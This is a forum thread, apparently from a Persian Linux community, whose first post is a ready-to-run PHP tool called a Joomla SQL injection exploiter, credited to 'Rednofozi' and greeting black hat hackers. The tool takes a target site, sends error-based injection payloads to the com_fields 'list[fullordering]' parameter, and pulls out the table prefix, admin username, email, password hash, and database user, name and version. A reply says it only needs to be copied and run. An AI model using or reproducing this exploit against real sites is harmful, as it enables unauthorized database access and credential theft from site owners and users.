اطلاعیه

بستن
هنوز اطلاعیه ای در دست نیست.

joomla SQL Injection exploiter

بستن
X
 
  • فیلتر کردن
  • زمان
  • نمایش
Clear All
پست های جدید

    joomla SQL Injection exploiter

    کد:
     
      [COLOR=#000000] [COLOR=#0000BB]<?php  session_start[/COLOR][COLOR=#007700]();  [/COLOR][COLOR=#0000BB]error_reporting[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]set_time_limit[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#FF8000]/* Coded By Rednofozi*/  [/COLOR][COLOR=#0000BB]$head [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#DD0000]'  <html>  <head>  <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>  </script>  <title>--==[[Mannu joomla SQL Injection exploiter by Rednofozi ]]==--</title>  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">  <STYLE>  body {  font-family: Tahoma;  color: white;  background: #333333;  }  input {  border : solid 2px ;  border-color : black;  BACKGROUND-COLOR: #444444;  font: 8pt Verdana;  color: white;  }  submit {  BORDER: buttonhighlight 2px outset;  BACKGROUND-COLOR: Black;  width: 30%;  color: #FFF;  }  #t input[type="submit"]{  COLOR: White;  border:none;  BACKGROUND-COLOR: black;  }  #t input[type="submit"]:hover {    BACKGROUND-COLOR: #ff9933;  color: black;    }  tr {  BORDER: dashed 1px #333;  color: #FFF;  }  td {  BORDER: dashed 0px ;  }  .table1 {  BORDER: 0px Black;  BACKGROUND-COLOR: Black;  color: #FFF;  }  .td1 {  BORDER: 0px;  BORDER-COLOR: #333333;  font: 7pt Verdana;  color: Green;  }  .tr1 {  BORDER: 0px;  BORDER-COLOR: #333333;  color: #FFF;  }  table {  BORDER: dashed 2px #333;  BORDER-COLOR: #333333;  BACKGROUND-COLOR: #191919;;  color: #FFF;  }  textarea {  border : dashed 2px #333;  BACKGROUND-COLOR: Black;  font: Fixedsys bold;  color: #999;  }  A:link {  border: 1px;  COLOR: red; TEXT-DECORATION: none  }  A:visited {  COLOR: red; TEXT-DECORATION: none  }  A:hover {  color: White; TEXT-DECORATION: none  }  A:active {  color: white; TEXT-DECORATION: none  }  </STYLE>  <script type="text/javascript">  <!--  function lhook(id) {  var e = document.getElementById(id);  if(e.style.display == "block")  e.style.display = "none";  else  e.style.display = "block";  }  //-->  </script>  '[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#0000BB]$head [/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'  <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >    <td width="100%" align=center valign="top" rowspan="1">  <font color=#ff9933 size=5 face="comic sans ms">--==[[ Mannu ]]==--</font><br><font color=#ff9933 size=3 face="comic sans ms">--==[[ Joomla </font><font color=white size=3 face="comic sans ms">SQL Injection exploiter By Team </font><font color=green size=3 face="comic sans ms"> INDIShEll]]==--</font> <div class="hedr">  <td height="10" align="left" class="td1"></td></tr><tr><td  width="100%" align="center" valign="top" rowspan="1"><font  color="red" face="comic sans ms"size="1"><b>  <font color=#ff9933>  ##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>  -==[[Greetz to]]==--</font><br> <font color=#ff9933>ReZa CLONER  , Moeein Seven  <br#--tnx to : ReZa CLONER  , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow<br>  <font color=white>--==[[Love to]]==--</font><br>black hat hackers ,iran hackers <br>  <font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>Rednofozi:D</font> <br></font>  <b>  <font color=#ff9933>  ##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>    </table>  </table>   '[/COLOR][COLOR=#007700];      function [/COLOR][COLOR=#0000BB]unhex[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$hex[/COLOR][COLOR=#007700]){  for([/COLOR][COLOR=#0000BB]$i[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];[/COLOR][COLOR=#0000BB]$i[/COLOR][COLOR=#007700]<[/COLOR][COLOR=#0000BB]strlen[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$hex[/COLOR][COLOR=#007700]);[/COLOR][COLOR=#0000BB]$i[/COLOR][COLOR=#007700]+=[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700])  [/COLOR][COLOR=#0000BB]$str [/COLOR][COLOR=#007700].= [/COLOR][COLOR=#0000BB]chr[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]hexdec[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]substr[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$hex[/COLOR][COLOR=#007700],[/COLOR][COLOR=#0000BB]$i[/COLOR][COLOR=#007700],[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700])));  return [/COLOR][COLOR=#0000BB]$str[/COLOR][COLOR=#007700];  }    function [/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$lu[/COLOR][COLOR=#007700])  {  [/COLOR][COLOR=#0000BB]$ch [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]curl_init[/COLOR][COLOR=#007700]();  [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_URL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$lu[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_HTTP_VERSION[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURL_HTTP_VERSION_1_0[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_HEADER[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_RETURNTRANSFER[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_CONNECTTIMEOUT[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]5[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_SSL_VERIFYPEER[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]false[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]curl_setopt[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]CURLOPT_USERAGENT[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$result[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'EXE'[/COLOR][COLOR=#007700]] = [/COLOR][COLOR=#0000BB]curl_exec[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]curl_close[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$ch[/COLOR][COLOR=#007700]);  return [/COLOR][COLOR=#0000BB]$result[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'EXE'[/COLOR][COLOR=#007700]];  }    [/COLOR][COLOR=#0000BB]?> [/COLOR] [/COLOR]      <div align=center>  <img src="">   <font size=4 color=white face="comic sans ms">--==[[ code for Rednofozi ]]==-- </font>  <img src="">  <br><br>  <form method=post>  <input type=input name=in value=target>  <input type=submit name=sm value="Exploit it">  </form>    [COLOR=#000000] [COLOR=#0000BB]<?php   [/COLOR][COLOR=#007700]if(isset([/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'sm'[/COLOR][COLOR=#007700]]))  {  [/COLOR][COLOR=#0000BB]$target[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'in'[/COLOR][COLOR=#007700]]);      [/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$target[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]'/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]='[/COLOR][COLOR=#007700];      [/COLOR][COLOR=#0000BB]$payload[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,hex(table_name),0x7e7e7e)/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1)))=1'[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$payload[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]);    [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]);  [/COLOR][COLOR=#0000BB]$def[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]);    [/COLOR][COLOR=#0000BB]$table_name[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]unhex[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$def[/COLOR][COLOR=#007700]);  echo [/COLOR][COLOR=#DD0000]'Table names used for grabbing database table prefix ->'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$table_name[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'<br>'[/COLOR][COLOR=#007700];    [/COLOR][COLOR=#0000BB]$prefix[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'_'[/COLOR][COLOR=#007700],[/COLOR][COLOR=#0000BB]$table_name[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$total_char[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]10[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$start[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$loop_end[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]false[/COLOR][COLOR=#007700];      while([/COLOR][COLOR=#0000BB]$loop_end[/COLOR][COLOR=#007700]!=[/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700])  {        [/COLOR][COLOR=#0000BB]$payload2[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(password,'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$start[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]','[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$total_char[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]'),0x7e7e7e)/**/from/**/'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$prefix[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]].[/COLOR][COLOR=#DD0000]'_users/**/limit/**/0,1)))=1'[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$payload2[/COLOR][COLOR=#007700];    [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]);  [/COLOR][COLOR=#0000BB]$ddd[/COLOR][COLOR=#007700].=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]);  if([/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]])==[/COLOR][COLOR=#DD0000]''[/COLOR][COLOR=#007700])  {  break;  [/COLOR][COLOR=#0000BB]$loop_end[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700];    }  [/COLOR][COLOR=#0000BB]$i[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$i[/COLOR][COLOR=#007700]+[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$start[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$start[/COLOR][COLOR=#007700]+[/COLOR][COLOR=#0000BB]10[/COLOR][COLOR=#007700];    }      [/COLOR][COLOR=#0000BB]$username[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(username,1,20),0x7e7e7e)/**/from/**/'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$prefix[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]].[/COLOR][COLOR=#DD0000]'_users/**/limit/**/0,1)))=1'[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$username[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]);  [/COLOR][COLOR=#0000BB]$user_name[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]);    [/COLOR][COLOR=#0000BB]$email[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(email,1,20),0x7e7e7e)/**/from/**/'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$prefix[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]].[/COLOR][COLOR=#DD0000]'_users/**/limit/**/0,1)))=1'[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$email[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]);  [/COLOR][COLOR=#0000BB]$email[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]);    [/COLOR][COLOR=#0000BB]$dbuser[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(user(),1,20),0x7e7e7e))))=1'[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$dbuser[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]);  [/COLOR][COLOR=#0000BB]$db_user[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]);    [/COLOR][COLOR=#0000BB]$dbname[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(database(),1,20),0x7e7e7e))))=1'[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$dbname[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]);  [/COLOR][COLOR=#0000BB]$db_name[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]);    [/COLOR][COLOR=#0000BB]$dbversion[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#DD0000]'1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(version(),1,20),0x7e7e7e))))=1'[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]$inject[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$dbversion[/COLOR][COLOR=#007700];  [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]data[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$final_url[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$data_extracted[/COLOR][COLOR=#007700]);  [/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]explode[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"~~~"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$de0[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]]);  [/COLOR][COLOR=#0000BB]$db_version[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]trim[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$de1[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]);      if([/COLOR][COLOR=#0000BB]$email[/COLOR][COLOR=#007700]!=[/COLOR][COLOR=#DD0000]'' [/COLOR][COLOR=#007700]|| [/COLOR][COLOR=#0000BB]$user_name[/COLOR][COLOR=#007700]!=[/COLOR][COLOR=#DD0000]'' [/COLOR][COLOR=#007700]|| [/COLOR][COLOR=#0000BB]$ddd[/COLOR][COLOR=#007700]!=[/COLOR][COLOR=#DD0000]''[/COLOR][COLOR=#007700])  {  echo [/COLOR][COLOR=#DD0000]'Target <a href="'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$target[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]'">'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$target[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]'</a> has been injected successfully, find username, email and password given below<br><br>'[/COLOR][COLOR=#007700];    echo [/COLOR][COLOR=#DD0000]'<table width=80% style="border:0px; background-color : transparent;">'[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'<tr><td align=right width=20%>Database username is -> </td><td align=left width=80%><font color=#f9e79f>'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$db_user[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'</font></td></tr>'[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'<tr><td align=right width=20%>Database name is -> </td><td align=left width=80%><font color=#f9e79f>'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$db_name[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'</font></td></tr>'[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'<tr><td align=right width=20%>Database version is -> </td><td align=left width=80%><font color=#f9e79f>'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$db_version[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'</font></td></tr>'[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'<tr><td align=right width=20%>Username is -> </td><td align=left width=80%><font color=#f9e79f>'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$user_name[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'</font></td></tr>'[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'<tr><td align=right width=20%>Email is -> </td><td align=left width=80%><font color=#f9e79f>'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$email[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'</font></td></tr>'[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'<tr><td align=right width=20%>Password hash is -> </td><td align=left width=80%><font color=#f9e79f>'[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$ddd[/COLOR][COLOR=#007700];  echo [/COLOR][COLOR=#DD0000]'</font></td></tr></table>'[/COLOR][COLOR=#007700];  }        }        [/COLOR][COLOR=#0000BB]?> [/COLOR] [/COLOR]                                                         |--------------------------------------------------------------|  ****************************************************************  Discovered by : Rednofozi

    #2
    ابزار کافیه کپی کنی روی پی اچ پی اجرا کنی

    کامنت

    درباره انجمن منطقه لینوکسی ها

    انجمن منطقه لینوکسی ها با هدف ارتقاء سطح علمی کاربران در سطح جهانی و همچنین کمک به بالا بردن سطح علمی عمومی در زمینه های تخصصی فوق پایه گذاری شده است. انجمن منطقه لینوکسی ها از طریق کارشناسان و متخصصان پاسخگوی سوالات گوناگون کاربران مبتدی یا پیشرفته میباشد تا حد امکان تلاش شده که محیطی متنوع و کاربر پسند و به دور از هرگونه حاشیه جهت فعالیت کاربران در این انجمن ایجاد شود. لذا ما به صورت مستمر برای پیشرفت کمی و کیفی محتوی و اطلاعات انجمنمان میکوشیم که این برای ما ارزشمند و حائز اهمیت است. کلیه حقوق،اطلاعات و مقالات در این انجمن متعلق به سایت منطقه لینوکسی ها میباشد، و هرگونه نسخه برداری بدون ذکر منبع مورد پیگرد قانونی خواهد شد.

    شبکه های اجتماعی
    در حال انجام ...
    X